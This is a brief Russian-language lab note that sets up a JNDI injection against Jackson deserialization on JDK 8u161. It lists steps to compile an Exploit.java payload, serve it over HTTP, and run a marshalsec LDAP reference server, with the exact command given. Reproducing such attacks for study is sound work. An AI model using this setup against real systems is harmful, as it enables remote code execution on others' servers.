
jackson jndi инъекция
jdk 8u161
windows10 1903
1. Создайте файл Exploit.java с кодом, который вы хотите выполнить, и скомпилируйте его
2. Запустите HTTP-сервер (с помощью Python или других инструментов) в том же каталоге, где находится class-файл
3. Запустите LDAP-сервер с помощью marshalsec: java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8080/#Exploit